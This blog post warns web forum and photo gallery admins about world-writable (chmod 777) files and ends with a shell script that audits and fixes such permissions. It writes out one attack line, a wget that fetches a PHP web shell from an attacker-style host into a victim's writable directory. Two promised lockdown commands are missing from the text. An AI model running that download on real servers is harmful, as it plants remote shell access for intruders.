Want to get hacked? It’s easy, just ‘chmod 777’ everything the next time you install a bbs or photo gallery application. Don’t want to get hacked? Read on and ‘find’ how hackers see and exploit the unsecured areas of your system.
For those of you running online community applications such as phpBB, vBulletin, Coppermine Gallery, Mambo and a few others, installation can be a breeze if you have shell access. That said, installations can also lead to an unwanted visit if you get sloppy with your file permissions during the install.
The ne’er-do-well runs a Google search for those websites that are ‘Powered by: vBulletin Version 3.0.x.’ Upon finding a potential victim, they visit the site and … pay attention now … through their browser request a URL on your system that contains a remote command. That first remote command is likely to include “find -perm 777”, giving the hakr all the information he needs to then “wget http://myhakrhost.ru/myshell.php -O /your/unsecure/directory/logon.php” onto your system. Once that happens, there is nothing left but to wipe your system clean and pray your backups are recent and reliable (more on that topic another time).
So two things I ask of you.
- Keep your online applications up-to-date – get on their mailing list to keep abreast of changes, updates and patches.
- For those of you with shell access to your system, run file permission scans such as ‘find -perm 777’ on your system before someone less trustworthy does. You might be disturbed by what you ‘find.’
For those of you whose paranoia-meter just went off scale, here is a command that for now will lock down those open areas:
For those of you with root access:
You may also want to run a scan for programs that provide web-based shell access. You’ll be glad you did.
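The permission scan recommended above, written out as an added example that is not the original post's own command. It extends ‘find -perm 777’ to any world-writable entry and to PHP files sitting in world-writable directories. The function names and the sample tree are hypothetical, and `-maxdepth` assumes GNU or BSD find.

```shell
#!/bin/sh
# Added example (not from the original post): audit a web root for loose modes.

# Entries whose mode is exactly 777, as `find -perm 777` reports them.
# Symlinks always show as 777 on Linux, so they are skipped as noise.
scan_777() {
    find "$1" -xdev ! -type l -perm 777 -print
}

# Broader check: anything with the world-write bit set (777, 666, 757, ...).
scan_world_writable() {
    find "$1" -xdev ! -type l -perm -0002 -print
}

# PHP files directly inside world-writable directories: the place a
# dropped script such as the post's logon.php would land.
scan_php_in_writable_dirs() {
    find "$1" -xdev -type d -perm -0002 \
        -exec find {} -maxdepth 1 -type f -name '*.php' -print \;
}

# Clear only the world-write bit; owner and group bits stay as they were.
remove_world_write() {
    find "$1" -xdev ! -type l -perm -0002 -exec chmod o-w {} +
}

# Constructed sample tree (hypothetical paths) so the example runs offline.
make_sample_tree() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/forum/uploads" "$root/forum/includes"
    echo '<?php ?>' > "$root/forum/index.php"
    echo '<?php ?>' > "$root/forum/uploads/logon.php"
    echo 'data' > "$root/forum/uploads/cache.dat"
    chmod 755 "$root/forum" "$root/forum/includes"
    chmod 644 "$root/forum/index.php" "$root/forum/uploads/logon.php"
    chmod 777 "$root/forum/uploads"
    chmod 666 "$root/forum/uploads/cache.dat"
    ln -s index.php "$root/forum/home.php"
    echo "$root"
}

# Assumption: set WEBROOT to your own docroot; otherwise the sample tree is used.
WEBROOT=${WEBROOT:-$(make_sample_tree)}
echo "mode 777:";             scan_777 "$WEBROOT"
echo "world-writable:";       scan_world_writable "$WEBROOT"
echo "php in writable dirs:"; scan_php_in_writable_dirs "$WEBROOT"
```

Review the scan output before calling `remove_world_write`, since an application may need its upload or cache directory writable by the web server's own user or group.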